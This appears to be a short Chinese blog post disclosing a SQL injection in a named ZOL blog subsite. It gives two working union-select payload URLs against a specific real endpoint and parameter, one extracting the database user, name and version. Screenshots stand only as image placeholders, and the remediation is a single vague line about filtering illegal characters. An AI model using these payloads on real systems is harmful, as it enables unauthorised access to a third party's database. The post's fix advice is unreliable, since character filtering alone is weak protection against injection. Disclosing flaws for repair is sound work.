中关村在线博客子站SQL注入及修复方案

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5– 
 中关村在线博客子站SQL注入及修复方案插图
 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5– 
中关村在线博客子站SQL注入及修复方案插图1
中关村在线博客子站SQL注入及修复方案插图2
中关村在线博客子站SQL注入及修复方案插图3
修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。 

发表评论

邮箱地址不会被公开。 必填项已用*标注